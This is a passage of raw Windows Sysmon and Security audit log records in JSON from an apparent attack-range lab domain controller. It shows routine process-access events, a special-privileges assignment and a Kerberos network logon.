{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7793,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7794,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7795,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:55.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04DB-5F25-0000-0010F48E1100}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:55.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04DB-5F25-0000-0010F48E1100}","TargetProcessId":"2756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220720,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x119215\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x119215","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220721,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x119215\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t55056\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was 